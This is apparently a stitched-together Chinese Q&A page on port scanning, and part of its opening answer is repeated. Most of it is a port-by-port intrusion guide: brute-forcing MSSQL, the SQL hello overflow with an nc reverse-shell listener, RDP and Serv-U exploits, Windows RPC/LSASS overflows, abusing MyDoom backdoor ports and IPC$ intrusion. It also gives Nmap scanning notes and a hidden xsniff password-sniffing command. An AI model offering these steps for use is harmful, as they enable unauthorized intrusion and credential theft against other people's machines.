如何扫描端口?
你是扫描自己还是别人的?扫描自己是否开放那些端口在运行-CMD-NETSTAT -NA如果是扫描别人的?首先先弄清楚什么是端口,端口的原理,尝试与目标主机的某些端口建立连接,如果目标主机该端口有回复,则说明该端口开放,即为“活动端口”。一台计算机可以有上万个端口,至于怎么扫描?咳。。。。。不好说。。。
怎么扫描端口啊?入侵技术!
各种端口的入侵 ***
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPas*.**e 进行字典暴破(字典是关键)
最后 SQLTool*.**e入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(啊D的注入软件)。
5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC$入侵
11.4779端口
s扫描器 加远程控制任我行
如何扫描端口?
你是扫描自己还是别人的?扫描自己是否开放那些端口在运行-CMD-NETSTAT
-NA如果是扫描别人的?首先先弄清楚什么是端口,端口的原理,尝试与目标主机的某些端口建立连接,如果目标主机该端口有回复,则说明该端口开放,即为“活动端口”。一台计算机可以有上万个端口,至于怎么扫描?咳。。。。。不好说。。。
怎么扫描开放了某个端口的计算机
开始-运行- CMD , 输入 netstat -an 然后回车就可以查看端口
可以使用比较流行的软件XSCAN。呵呵
许多安全类网站都有。呵呵
另外推荐看看这个页面。。~~
*** 安全:Nmap端口扫描
nmap -sS minimum ip/范围
TCP SYN scans:
nmap -sS target ip
nmap使用在连接层的Address Resolution Protocol询问target ip的MAC地址,并获得回应,但是没有TCP包。
nmap显示所有端口都被过滤了,猜想是防火墙过滤了TCP SYN的包。后来发现是虚拟机 *** 的混杂模式设为了拒绝,调成允许所有之后:
nmap发出了1000个TCPSYN,等待目标主机TCP ACK回应,打开的端口在ACK中包含Source port=自己的端口号,关闭的端口Source port=54247。
1000个端口中有四个端口打开了。
UDP scans:
nmap -sU target ip --host-timeout 100
设置timeout以免等待时间过长。
nmap发出了UDP包,等待目标主机ICMP 70/110 Destination unreachable回应。
扩大搜索范围以纳入更高端口。
nmap --top-ports 10000 target ip
nmap -p 10000-30000 target ip
nmap -sV -p 13337 target ip
这是一个Apache HTTP服务器。
如何使用X-SCAN对指定的IP开放的端口扫描?
xsniff 选项
选项含义如下:
-tcp : 输出TCP数据报
-udp : 输出UDP数据报
-icmp : 输出ICMP数据报
-pass : 过滤密码信息
-hide : 后台运行
-host : 解析主机名
-addr IP地址 : 过滤IP地址
-port 端口 : 过滤端口
-log 文件名 : 将输出保存到文件
-asc : 以ASCII形式输出
-hex : 以16进制形式输出
示例:xsniff.exe -pass -hide -log pass.log
xsniff.exe -tcp -udp -asc -addr 192.168.1.1
0条大神的评论